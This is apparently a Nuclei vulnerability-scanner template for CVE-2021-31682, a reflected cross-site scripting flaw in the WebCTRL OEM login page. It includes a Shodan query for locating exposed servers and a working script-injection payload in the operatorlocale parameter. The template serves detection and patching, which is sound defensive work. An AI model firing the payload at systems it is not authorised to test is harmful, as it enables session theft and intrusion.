55 lines
2.1 KiB
YAML
55 lines
2.1 KiB
YAML
id: CVE-2021-31682
|
|
|
|
info:
|
|
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
|
author: gy741,dhiyaneshDk
|
|
severity: medium
|
|
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682).
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-31682
|
|
- https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
|
|
- https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
|
|
- http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-31682
|
|
cwe-id: CWE-79
|
|
epss-score: 0.01071
|
|
epss-percentile: 0.8266
|
|
cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: automatedlogic
|
|
product: webctrl
|
|
shodan-query: html:"/_common/lvl5/dologin.jsp"
|
|
tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"><script>alert(document.domain)</script>'
|
|
- 'common/lvl5'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220257c720902a3847cc4346747a5355ec4c9ac906dd9c10cfd8f56e8244c900dff0221008e7299479ffd72a60b3ad359d60aa6a2d5ba1f2a5ec7b759d170ee2f3dac9cee:922c64590222798bb761d5b6d8e72950 |